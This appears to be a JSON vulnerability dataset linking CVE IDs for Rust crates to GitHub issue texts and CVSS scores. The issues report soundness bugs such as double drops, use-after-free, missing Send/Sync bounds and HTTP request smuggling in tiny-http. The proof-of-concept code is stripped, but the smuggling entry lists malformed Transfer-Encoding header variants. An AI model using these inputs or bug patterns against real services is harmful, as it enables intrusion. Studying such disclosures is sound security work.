  85288. "description": "Custom Read on uninitialized buffer may cause UB. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Feb NUMBERTAG there is not yet an ideal fix that works with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Rust RFC NUMBERTAG URLTAG Discussion in Rust Internals Forum URLTAG",
  85289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85290. "severity": "HIGH",
  85291. "baseScore": 7.5,
  85292. "impactScore": 3.6,
  85293. "exploitabilityScore": 3.9
  85294. },
  85295. {
  85296. "CVE_ID": "CVE-2021-27376",
  85297. "Issue_Url_old": "https://github.com/smol-rs/nb-connect/issues/1",
  85298. "Issue_Url_new": "https://github.com/smol-rs/nb-connect/issues/1",
  85299. "Repo_new": "smol-rs/nb-connect",
  85300. "Issue_Created_At": "2020-12-15T11:18:00Z",
  85301. "description": "Invalid assumption of APITAG layout. This code assumes that Rust's APITAG are layout compatible with sockaddr : URLTAG This is not guaranteed by the standard library, see URLTAG for more details.",
  85302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85303. "severity": "CRITICAL",
  85304. "baseScore": 9.8,
  85305. "impactScore": 5.9,
  85306. "exploitabilityScore": 3.9
  85307. },
  85308. {
  85309. "CVE_ID": "CVE-2021-28031",
  85310. "Issue_Url_old": "https://github.com/okready/scratchpad/issues/1",
  85311. "Issue_Url_new": "https://github.com/okready/scratchpad/issues/1",
  85312. "Repo_new": "okready/scratchpad",
  85313. "Issue_Created_At": "2021-02-18T19:44:32Z",
  85314. "description": "panic safety: double drop may happen in two functions. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Two functions allow double drop of an object upon panic: APITAG , APITAG . Both functions take user provided closure as parameter, and a double drop of an object happens upon panic inside the user provided closure. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of scratchpad . APITAG Detail APITAG APITAG struct Foo is dropped twice upon panic in user provided closure. ERRORTAG Output: ERRORTAG Tested Environment Crate: scratchpad Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  85315. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85316. "severity": "CRITICAL",
  85317. "baseScore": 9.8,
  85318. "impactScore": 5.9,
  85319. "exploitabilityScore": 3.9
  85320. },
  85321. {
  85322. "CVE_ID": "CVE-2020-35858",
  85323. "Issue_Url_old": "https://github.com/danburkert/prost/issues/267",
  85324. "Issue_Url_new": "https://github.com/danburkert/prost/issues/267",
  85325. "Repo_new": "danburkert/prost",
  85326. "Issue_Created_At": "2020-01-16T11:10:21Z",
  85327. "description": "Stack overflow when parsing message. When parsing certain messages, the process aborts with a stack overflow. I made a reproducer URLTAG : ERRORTAG Potentially the data requests allocation of a buffer that's larger than the actually available data NUMBERTAG APITAG input data is not that large...) APITAG through FILETAG",
  85328. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85329. "severity": "CRITICAL",
  85330. "baseScore": 9.8,
  85331. "impactScore": 5.9,
  85332. "exploitabilityScore": 3.9
  85333. },
  85334. {
  85335. "CVE_ID": "CVE-2021-29930",
  85336. "Issue_Url_old": "https://github.com/ibabushkin/arenavec/issues/1",
  85337. "Issue_Url_new": "https://github.com/ibabushkin/arenavec/issues/1",
  85338. "Repo_new": "ibabushkin/arenavec",
  85339. "Issue_Created_At": "2021-01-12T14:49:59Z",
  85340. "description": "double free error may happen in NUMBERTAG functions. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG Drop uninitialized memory upon panic within APITAG . URLTAG APITAG double free upon panic within APITAG in line NUMBERTAG URLTAG APITAG double free upon panic within APITAG in line NUMBERTAG URLTAG Proof of Concept Example program below exhibits a double drop on the same object. ERRORTAG Program Output The message APITAG is printed twice, indicating the same object was dropped twice. ERRORTAG Suggested Fix APITAG : Move APITAG to after all writes are done. APITAG & APITAG : Move APITAG to before APITAG . Thank you for checking out this issue!",
  85341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85342. "severity": "HIGH",
  85343. "baseScore": 7.5,
  85344. "impactScore": 3.6,
  85345. "exploitabilityScore": 3.9
  85346. },
  85347. {
  85348. "CVE_ID": "CVE-2020-35892",
  85349. "Issue_Url_old": "https://github.com/nathansizemore/simple-slab/issues/2",
  85350. "Issue_Url_new": "https://github.com/nathansizemore/simple-slab/issues/2",
  85351. "Repo_new": "nathansizemore/simple-slab",
  85352. "Issue_Created_At": "2020-09-04T03:55:57Z",
  85353. "description": "APITAG allows out of bound read and APITAG has off by one error. Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. URLTAG URLTAG Description APITAG does not perform the boundary checking, which leads to out of bound read access. APITAG copies an element from an invalid address due to off by one error, resulting in memory leakage and uninitialized memory drop. Demonstration Crate: simple slab Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  85355. "severity": "CRITICAL",
  85356. "baseScore": 9.1,
  85357. "impactScore": 5.2,
  85358. "exploitabilityScore": 3.9
  85359. },
  85360. {
  85361. "CVE_ID": "CVE-2020-36457",
  85362. "Issue_Url_old": "https://github.com/vertexclique/lever/issues/15",
  85363. "Issue_Url_new": "https://github.com/vertexclique/lever/issues/15",
  85364. "Repo_new": "vertexclique/lever",
  85365. "Issue_Created_At": "2020-11-10T16:44:10Z",
  85366. "description": "APITAG should have bounds on its APITAG traits. Currently APITAG implements the APITAG traits unconditionally: URLTAG I think this should only be when APITAG and APITAG respectively. Otherwise, this makes it possible to send across types that aren't safe to use across threads such as Cell s. Here's a demonstration that causes a data race: ERRORTAG This outputs: APITAG",
  85367. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85368. "severity": "HIGH",
  85369. "baseScore": 8.1,
  85370. "impactScore": 5.9,
  85371. "exploitabilityScore": 2.2
  85372. },
  85373. {
  85374. "CVE_ID": "CVE-2020-36444",
  85375. "Issue_Url_old": "https://github.com/google/rust-async-coap/issues/33",
  85376. "Issue_Url_new": "https://github.com/google/rust-async-coap/issues/33",
  85377. "Repo_new": "google/rust-async-coap",
  85378. "Issue_Created_At": "2020-12-08T20:46:21Z",
  85379. "description": "APITAG Send and Sync should have bounds on RC. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync so long as APITAG and APITAG . URLTAG However, this should also probably be bounded by APITAG and APITAG , otherwise it's possible to smuggle across non Send types across thread boundaries. Here's a proof of concept that segfaults safe rust code: ERRORTAG Output: APITAG",
  85380. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85381. "severity": "HIGH",
  85382. "baseScore": 8.1,
  85383. "impactScore": 5.9,
  85384. "exploitabilityScore": 2.2
  85385. },
  85386. {
  85387. "CVE_ID": "CVE-2020-35884",
  85388. "Issue_Url_old": "https://github.com/tiny-http/tiny-http/issues/173",
  85389. "Issue_Url_new": "https://github.com/tiny-http/tiny-http/issues/173",
  85390. "Repo_new": "tiny-http/tiny-http",
  85391. "Issue_Created_At": "2020-06-16T11:17:22Z",
  85392. "description": "HTTP Request Smuggling Hardening. Posting it here for community patches after talking with the maintainers privately. Issue: tiny http doesn't prevent Request Smuggling attacks (CE:TL,TL:TL) where a frontend proxy might allow/pass malformed Transfer Encoding headers but tiny http will normalise them Steps to Reproduce Use a vulnerable version of APITAG in the following setup ( URLTAG as a frontend Use an example framework such as Rouille (which uses tiny http) ( FILETAG as a backend Now send a request similar to the following ERRORTAG In the above example, the request is sent with the Transfer encoding header having extra spaces APITAG Encoding : chunked). This is in violation of RFC NUMBERTAG tiny http is normalizing the ERRORTAG header, hence we get the below reponse. ERRORTAG More variations of this exist: ` Transfer Encoding: \"chunked\" Transfer Encoding: chunked Transfer Encoding: 'chunked' Transfer Encoding: chunk Transfer Encoding: chunked\u000b Transfer Encoding: chunked\u007f Transfer Encoding:",
  85393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  85394. "severity": "MEDIUM",
  85395. "baseScore": 6.5,
  85396. "impactScore": 2.5,
  85397. "exploitabilityScore": 3.9
  85398. },
  85399. {
  85400. "CVE_ID": "CVE-2021-28306",
  85401. "Issue_Url_old": "https://github.com/MoAlyousef/fltk-rs/issues/519",
  85402. "Issue_Url_new": "https://github.com/fltk-rs/fltk-rs/issues/519",
  85403. "Repo_new": "fltk-rs/fltk-rs",
  85404. "Issue_Created_At": "2021-02-18T20:48:04Z",
  85405. "description": "[BUG] APITAG causes segmentation fault. Setting the label type of a widget to APITAG causes segmentation fault. Here is code to reproduce: ERRORTAG Expected behavior I have no idea what Multi label type does, I was just experimenting. Meta info OS: Arch Linu NUMBERTAG FLTKL Version NUMBERTAG",
  85406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85407. "severity": "HIGH",
  85408. "baseScore": 7.5,
  85409. "impactScore": 3.6,
  85410. "exploitabilityScore": 3.9
  85411. },
  85412. {
  85413. "CVE_ID": "CVE-2020-36205",
  85414. "Issue_Url_old": "https://github.com/rtbo/rust-xcb/issues/93",
  85415. "Issue_Url_new": "https://github.com/rtbo/rust-xcb/issues/93",
  85416. "Repo_new": "rtbo/rust-xcb",
  85417. "Issue_Created_At": "2020-12-10T19:35:59Z",
  85418. "description": "Soundness issue with ERRORTAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that xcb exports the ERRORTAG struct publicly: URLTAG Since the struct and its fields are public, it can be created from safe Rust code which can potentially leading to use after frees and double frees. Maybe this struct should have a hidden constructor or be marked ERRORTAG ? Here's a proof of concept showing a use after free with this struct: ERRORTAG This outputs: CODETAG",
  85419. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85420. "severity": "MEDIUM",
  85421. "baseScore": 5.5,
  85422. "impactScore": 3.6,
  85423. "exploitabilityScore": 1.8
  85424. },
  85425. {
  85426. "CVE_ID": "CVE-2020-36205",
  85427. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/93",
  85428. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/93",
  85429. "Repo_new": "rust-x-bindings/rust-xcb",
  85430. "Issue_Created_At": "2020-12-10T19:35:58Z",
  85431. "description": "Soundness issue with ERRORTAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that xcb exports the ERRORTAG struct publicly: URLTAG Since the struct and its fields are public, it can be created from safe Rust code which can potentially leading to use after frees and double frees. Maybe this struct should have a hidden constructor or be marked ERRORTAG ? Here's a proof of concept showing a use after free with this struct: ERRORTAG This outputs: CODETAG",
  85432. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85433. "severity": "MEDIUM",
  85434. "baseScore": 5.5,
  85435. "impactScore": 3.6,
  85436. "exploitabilityScore": 1.8
  85437. },
  85438. {
  85439. "CVE_ID": "CVE-2020-36210",
  85440. "Issue_Url_old": "https://github.com/mersinvald/autorand-rs/issues/5",
  85441. "Issue_Url_new": "https://github.com/mersinvald/autorand-rs/issues/5",
  85442. "Repo_new": "mersinvald/autorand-rs",
  85443. "Issue_Created_At": "2021-01-01T04:08:05Z",
  85444. "description": "impl Random on arrays can lead to dropping uninitialized memory. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG can potentially panic (since Random is a public trait and users can implement it on custom types) and if it does, the partially initialized array is dropped. Thus APITAG can be invoked on uninitialized memory, leading to undefined behavior. Thank you for reviewing this issue NUMBERTAG",
  85445. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85446. "severity": "HIGH",
  85447. "baseScore": 7.8,
  85448. "impactScore": 5.9,
  85449. "exploitabilityScore": 1.8
  85450. },
  85451. {
  85452. "CVE_ID": "CVE-2020-36211",
  85453. "Issue_Url_old": "https://github.com/Devolutions/gfwx-rs/issues/7",
  85454. "Issue_Url_new": "https://github.com/devolutions/gfwx-rs/issues/7",
  85455. "Repo_new": "devolutions/gfwx-rs",
  85456. "Issue_Created_At": "2020-12-08T07:10:42Z",
  85457. "description": "APITAG needs bounds on its Send and Sync traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync for all types: URLTAG However, this should probably be bound by APITAG and APITAG respectively. I realize this is an image library and the T will likely be a numeric type but without these bounds its possible to create data races from safe rust code and cause memory safety issues. Here's a rather contrived example where an \"image\" is backed by Cells causing a segfault from safe rust code: ERRORTAG Output: APITAG",
  85458. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85459. "severity": "HIGH",
  85460. "baseScore": 7.0,
  85461. "impactScore": 5.9,
  85462. "exploitabilityScore": 1.0
  85463. },
  85464. {
  85465. "CVE_ID": "CVE-2020-36442",
  85466. "Issue_Url_old": "https://github.com/maciejhirsz/beef/issues/37",
  85467. "Issue_Url_new": "https://github.com/maciejhirsz/beef/issues/37",
  85468. "Repo_new": "maciejhirsz/beef",
  85469. "Issue_Created_At": "2020-10-28T06:26:02Z",
  85470. "description": "APITAG lacks a Sync bound on its Send trait allowing for data races. I think the impl for Send on Cow should be bounded by APITAG or Sync like it is for references URLTAG and the APITAG itself URLTAG . URLTAG Without this it's possible to create references to a non Sync object like Cell through the use of a borrowed Cow. For example, consider the following program (uses APITAG to make dealing with threads easier): ERRORTAG This produces the output: APITAG While this example is pretty benign, here's how it can lead to a null pointer dereference from safe rust code: APITAG APITAG to expand code snippet APITAG ERRORTAG APITAG This example produces: APITAG",
  85471. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85472. "severity": "HIGH",
  85473. "baseScore": 8.1,
  85474. "impactScore": 5.9,
  85475. "exploitabilityScore": 2.2
  85476. },
  85477. {
  85478. "CVE_ID": "CVE-2020-35862",
  85479. "Issue_Url_old": "https://github.com/myrrlyn/bitvec/issues/55",
  85480. "Issue_Url_new": "https://github.com/ferrilab/bitvec/issues/55",
  85481. "Repo_new": "ferrilab/bitvec",
  85482. "Issue_Created_At": "2020-03-27T20:21:13Z",
  85483. "description": "Possible issue shrinking APITAG First, thank you for bitvec . I found a strange problem (freeing of unallocated memory) when shrinking a APITAG to a APITAG , but I can reproduce it only on macos. I have a hunch the problem may not be in bitvec at all, but possibly in something Rust specific. Any guidance will be appreciated. I created a reproducible minimal testcase in kulp/bitvec debugging URLTAG . Github Actions shows failure on macos URLTAG , whereas Ubuntu succeeds URLTAG (the Windows job URLTAG tends to be canceled because it does not finish before macos fails). On my Mac OS NUMBERTAG machine, test failure (with bitvec NUMBERTAG looks like this : ERRORTAG A backtrace URLTAG from ERRORTAG shows APITAG occurring during APITAG . The dynamically nearest bitvec code is this : ERRORTAG I wrote FILETAG that demonstrates the problem exists URLTAG across a broad swathe of Rust versions and bitvec versions. All NUMBERTAG ersions of Rust from NUMBERTAG through NUMBERTAG and all NUMBERTAG ersions of bitvec from NUMBERTAG through NUMBERTAG and NUMBERTAG as well) demonstrate the issue. For the real code in which this issue was first discovered, my only workaround is to switch to Linux, which is possible for the short term but rather worrying. Do you think it plausible that this is a Rust compiler or library issue ? if so, can you suggest a plan of attack for chasing it down further, or reporting it elsewhere ?",
  85484. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85485. "severity": "CRITICAL",
  85486. "baseScore": 9.8,
  85487. "impactScore": 5.9,
  85488. "exploitabilityScore": 3.9
  85489. },
  85490. {
  85491. "CVE_ID": "CVE-2020-36213",
  85492. "Issue_Url_old": "https://github.com/rodrimati1992/abi_stable_crates/issues/44",
  85493. "Issue_Url_new": "https://github.com/rodrimati1992/abi_stable_crates/issues/44",
  85494. "Repo_new": "rodrimati1992/abi_stable_crates",
  85495. "Issue_Created_At": "2020-12-21T06:39:13Z",
  85496. "description": "Update unsound APITAG and APITAG Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. URLTAG URLTAG These two implementations are copy pasted from Rust's standard library, and unfortunately it turns out that std implementations were containing soundness bugs (rust lang/rust NUMBERTAG and rust lang/rust NUMBERTAG respectively). Could you check them and update the respective part of this crate?",
  85497. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85498. "severity": "HIGH",
  85499. "baseScore": 7.5,
  85500. "impactScore": 3.6,
  85501. "exploitabilityScore": 3.9
  85502. },
  85503. {
  85504. "CVE_ID": "CVE-2020-36455",
  85505. "Issue_Url_old": "https://github.com/BrokenLamp/slock-rs/issues/2",
  85506. "Issue_Url_new": "https://github.com/brokenlamp/slock-rs/issues/2",
  85507. "Repo_new": "brokenlamp/slock-rs",
  85508. "Issue_Created_At": "2020-11-17T06:45:09Z",
  85509. "description": "Slock APITAG allows sending non Send types across thread boundaries. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Slock implements Send and Sync for all types: URLTAG This should probably be bounded by APITAG just like the FILETAG , otherwise this allows sending non Send types across thread boundaries which may invoke undefined behavior. Here's an example of this in action with an Rc segfaulting safe Rust code. Built with APITAG with APITAG feature enabled: ERRORTAG This outputs: APITAG",
  85510. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85511. "severity": "HIGH",
  85512. "baseScore": 8.1,
  85513. "impactScore": 5.9,
  85514. "exploitabilityScore": 2.2
  85515. },
  85516. {
  85517. "CVE_ID": "CVE-2021-45705",
  85518. "Issue_Url_old": "https://github.com/Absolucy/nanorand-rs/issues/28",
  85519. "Issue_Url_new": "https://github.com/absolucy/nanorand-rs/issues/28",
  85520. "Repo_new": "absolucy/nanorand-rs",
  85521. "Issue_Created_At": "2021-07-10T22:52:06Z",
  85522. "description": "Aliased mutable references with APITAG . Due to the implementation of APITAG & APITAG , the following code is unsound: ERRORTAG",
  85523. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85524. "severity": "CRITICAL",
  85525. "baseScore": 9.8,
  85526. "impactScore": 5.9,
  85527. "exploitabilityScore": 3.9
  85528. },
  85529. {
  85530. "CVE_ID": "CVE-2020-36208",
  85531. "Issue_Url_old": "https://github.com/oliver-giersch/conquer-once/issues/3",
  85532. "Issue_Url_new": "https://github.com/oliver-giersch/conquer-once/issues/3",
  85533. "Repo_new": "oliver-giersch/conquer-once",
  85534. "Issue_Created_At": "2020-12-23T00:31:47Z",
  85535. "description": "APITAG can send APITAG && Sync) objects across thread boundaries. Hello :crab: , we APITAG group APITAG gatech) found an undefined behavior issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Sync impl of APITAG By exploiting the fact that T has no Send bound, it is possible to make APITAG send a non Send object across thread boundaries. ERRORTAG Proof of Concept I prepared a small example that sends APITAG across thread boundaries using APITAG . ERRORTAG Suggested Fix Adding a Send bound to T as following will allow the compiler to revoke the example program above. ERRORTAG Thank you for checking out this issue NUMBERTAG",
  85536. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85537. "severity": "HIGH",
  85538. "baseScore": 7.8,
  85539. "impactScore": 5.9,
  85540. "exploitabilityScore": 1.8
  85541. },
  85542. {
  85543. "CVE_ID": "CVE-2020-36456",
  85544. "Issue_Url_old": "https://github.com/ratel-rust/toolshed/issues/12",
  85545. "Issue_Url_new": "https://github.com/ratel-rust/toolshed/issues/12",
  85546. "Repo_new": "ratel-rust/toolshed",
  85547. "Issue_Created_At": "2020-11-15T07:17:28Z",
  85548. "description": "APITAG allows synchronous use of non Sync types through references. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements Send as long as the underlying type implements Copy . However, one potential problem with this is that (non mutable) references actually implement the Copy trait: URLTAG This makes it possible, for example, to share Cell s across threads by wrapping them in a APITAG : ERRORTAG Output: APITAG Indicating that the same Cell is now usable across threads, potentially allowing for data races.",
  85549. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85550. "severity": "HIGH",
  85551. "baseScore": 8.1,
  85552. "impactScore": 5.9,
  85553. "exploitabilityScore": 2.2
  85554. },
  85555. {
  85556. "CVE_ID": "CVE-2021-25904",
  85557. "Issue_Url_old": "https://github.com/rust-av/rust-av/issues/136",
  85558. "Issue_Url_new": "https://github.com/rust-av/rust-av/issues/136",
  85559. "Repo_new": "rust-av/rust-av",
  85560. "Issue_Created_At": "2021-01-07T17:26:49Z",
  85561. "description": "APITAG can lead to segfault without ERRORTAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Since APITAG URLTAG doesn't validate its input pointers, it is possible to trigger undefined behavior without using ERRORTAG . Proof of Concept The example program below exhibits segmentation fault caused by dereferncing a null pointer. CODETAG Program Output APITAG NUMBERTAG rustc NUMBERTAG nightly) APITAG Suggested Fix APITAG API could be changed to an ERRORTAG API, since it requires users to check the validity of the input pointers in order to maintain safety guarantees. Thank you for checking out this issue NUMBERTAG",
  85562. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85563. "severity": "HIGH",
  85564. "baseScore": 7.5,
  85565. "impactScore": 3.6,
  85566. "exploitabilityScore": 3.9
  85567. },
  85568. {
  85569. "CVE_ID": "CVE-2020-35863",
  85570. "Issue_Url_old": "https://github.com/hyperium/hyper/issues/1925",
  85571. "Issue_Url_new": "https://github.com/hyperium/hyper/issues/1925",
  85572. "Repo_new": "hyperium/hyper",
  85573. "Issue_Created_At": "2019-09-04T19:34:15Z",
  85574. "description": "Client GET requests with transfer encoding are wrongly stripped. The client wrongly strips ERRORTAG from GET requests, thinking that GET requests shouldn't have payloads. However, FILETAG : > A payload within a GET request message has no defined semantics; > sending a payload body on a GET request might cause some existing > implementations to reject the request. The original implementation was trying to protect from empty APITAG s automatically adding ERRORTAG to a GET request. The fix should probably still protect against that, but if the APITAG header has been explicitly set on the Request , it should be forwarded as is.",
  85575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85576. "severity": "CRITICAL",
  85577. "baseScore": 9.8,
  85578. "impactScore": 5.9,
  85579. "exploitabilityScore": 3.9
  85580. },
  85581. {
  85582. "CVE_ID": "CVE-2020-35861",
  85583. "Issue_Url_old": "https://github.com/fitzgen/bumpalo/issues/69",
  85584. "Issue_Url_new": "https://github.com/fitzgen/bumpalo/issues/69",
  85585. "Repo_new": "fitzgen/bumpalo",
  85586. "Issue_Created_At": "2020-03-24T05:30:26Z",
  85587. "description": "segfault only in unit test. I'm very confusing current status and don't know what is wrong when I run this code in unit test with cargo test it failed with SIGSEGV Here is my test code URLTAG FILETAG but when I run same code in APITAG then it success FILETAG",
  85588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85589. "severity": "HIGH",
  85590. "baseScore": 7.5,
  85591. "impactScore": 3.6,
  85592. "exploitabilityScore": 3.9
  85593. },
  85594. {
  85595. "CVE_ID": "CVE-2021-25903",
  85596. "Issue_Url_old": "https://github.com/krl/cache/issues/2",
  85597. "Issue_Url_new": "https://github.com/krl/cache/issues/2",
  85598. "Repo_new": "krl/cache",
  85599. "Issue_Created_At": "2021-01-01T10:55:50Z",
  85600. "description": "Exposing internally stored raw pointers is unsafe. Hi, this segfaults with only \"safe\" code (i.e. not using ERRORTAG ): ERRORTAG May I suggest you yank URLTAG your crate? I think it is bad a crate with such basic issues (also see NUMBERTAG is available under the very exposed crate name cache . You could still use your crate outside of the registry by referencing the git repository URLTAG .",
  85601. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85602. "severity": "HIGH",
  85603. "baseScore": 7.5,
  85604. "impactScore": 3.6,
  85605. "exploitabilityScore": 3.9
  85606. },
  85607. {
  85608. "CVE_ID": "CVE-2021-29939",
  85609. "Issue_Url_old": "https://github.com/Alexhuszagh/rust-stackvector/issues/2",
  85610. "Issue_Url_new": "https://github.com/alexhuszagh/rust-stackvector/issues/2",
  85611. "Repo_new": "alexhuszagh/rust-stackvector",
  85612. "Issue_Created_At": "2021-02-19T15:31:01Z",
  85613. "description": "Memory safety issue in APITAG . Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , the APITAG 's upper bound is used authoritatively to verify the capacity and then up to APITAG elements are inserted directly into the APITAG : URLTAG However, if an Iterator incorrectly reports a APITAG here with a upper bound smaller than the lower bound, it can cause that first loop to write beyond the capacity of the stack and overwrite the stack. Here's an example: ERRORTAG This outputs: CODETAG As per the APITAG documentation URLTAG : > It is not enforced that an iterator implementation yields the declared number of elements. A buggy iterator may yield less than the lower bound or more than the upper bound of elements. > APITAG is primarily intended to be used for optimizations such as reserving space for the elements of the iterator, but must not be trusted to e.g., omit bounds checks in unsafe code. An incorrect implementation of APITAG should not lead to memory safety violations.",
  85614. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  85615. "severity": "HIGH",
  85616. "baseScore": 7.3,
  85617. "impactScore": 3.4,
  85618. "exploitabilityScore": 3.9
  85619. },
  85620. {
  85621. "CVE_ID": "CVE-2020-35882",
  85622. "Issue_Url_old": "https://github.com/SergioBenitez/Rocket/issues/1312",
  85623. "Issue_Url_new": "https://github.com/sergiobenitez/rocket/issues/1312",
  85624. "Repo_new": "sergiobenitez/rocket",
  85625. "Issue_Created_At": "2020-05-27T05:48:51Z",
  85626. "description": "Clone implementation for APITAG is unsound. The Bug APITAG is one of a few places that Rocket uses unsafe Rust. While auditing the code, I found that its Clone implementation is unsound. First, let's look at the definition of APITAG which implements a mutable Rc with a raw pointer: URLTAG The comment justifies that it is safe to have APITAG and APITAG which share the same Request pointer because modification from APITAG is not observable from APITAG However, APITAG Clone implementation allows to create two APITAG that share the same Request raw pointer, which was not part of the justification: URLTAG This ultimately permits the violation of aliasing rule with two APITAG instances that point to the same Request instance. Proof of Concept APITAG code: ERRORTAG Output: ERRORTAG The APITAG was tested on the following environment: Rocket NUMBERTAG latest at the time of writing) OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly (a NUMBERTAG d NUMBERTAG d NUMBERTAG Target NUMBERTAG unknown linux gnu The APITAG used a classic iterator invalidation to show it is possible to overwrite a pointer and a length of a string slice. Is this a security bug? Considering that NUMBERTAG APITAG is intended to be used for testing NUMBERTAG The exact pattern to trigger the bug is unlikely to happen in the wild I believe the security impact of this bug is minimal. I think It is still worthwhile to file a APITAG advisory after the bug confirmation considering the people who want to be notified about unsound APIs URLTAG . Possible Fixes I believe APITAG can be redesigned without breaking APITAG API with safe alternatives such as APITAG URLTAG or APITAG URLTAG . I think it is also possible to fix Clone to clone the internal Request, but the first solution which reduces the number of unsafe code should be preferred if possible.",
  85627. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85628. "severity": "HIGH",
  85629. "baseScore": 8.1,
  85630. "impactScore": 5.9,
  85631. "exploitabilityScore": 2.2
  85632. },
  85633. {
  85634. "CVE_ID": "CVE-2019-16882",
  85635. "Issue_Url_old": "https://github.com/Robbepop/string-interner/issues/9",
  85636. "Issue_Url_new": "https://github.com/robbepop/string-interner/issues/9",
  85637. "Repo_new": "robbepop/string-interner",
  85638. "Issue_Created_At": "2019-08-24T15:00:52Z",
  85639. "description": "Unsoundness (use after free) around APITAG and APITAG . Abstract By steps below, call to APITAG and APITAG cause use after free in APITAG NUMBERTAG Create a APITAG . I'll call it old NUMBERTAG Intern some string NUMBERTAG Clone old . I'll call the newly created interner old . + APITAG NUMBERTAG Drop old . + At this point, all APITAG s in APITAG is also going to be dropped NUMBERTAG Call APITAG or APITAG , passing same string as before. + These functions refer APITAG strings already dropped. This is UB. Code to reproduce CODETAG ERRORTAG The last APITAG should never fail, but it failed in my environment. APITAG is UB so it might success coincidentally...) See APITAG for more detailed explanation.",
